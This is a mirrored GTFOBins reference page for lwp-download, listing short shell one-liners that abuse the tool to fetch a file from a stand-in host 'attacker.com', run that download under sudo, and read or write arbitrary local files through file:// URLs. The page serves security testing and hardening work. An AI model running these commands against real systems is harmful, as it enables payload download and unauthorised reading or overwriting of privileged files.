1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/lwp-download.md
LinuxSploit 313a49d9f7 Update lwp-download.md
lwp-download drop the elevated privileges
2021-04-17 20:56:12 +02:00

662 B

description functions
Fetch a remote file via HTTP GET request.
file-download sudo file-read file-write
code
URL=http://attacker.com/file_to_get LFILE=file_to_save lwp-download $URL $LFILE
code
URL=http://attacker.com/file_to_get LFILE=file_to_save sudo lwp-download $URL $LFILE
description code
The file path must be absolute. LFILE=file_to_read TF=$(mktemp) lwp-download "file://$LFILE" $TF cat $TF
code
LFILE=file_to_write TF=$(mktemp) echo DATA >$TF lwp-download file://$TF $LFILE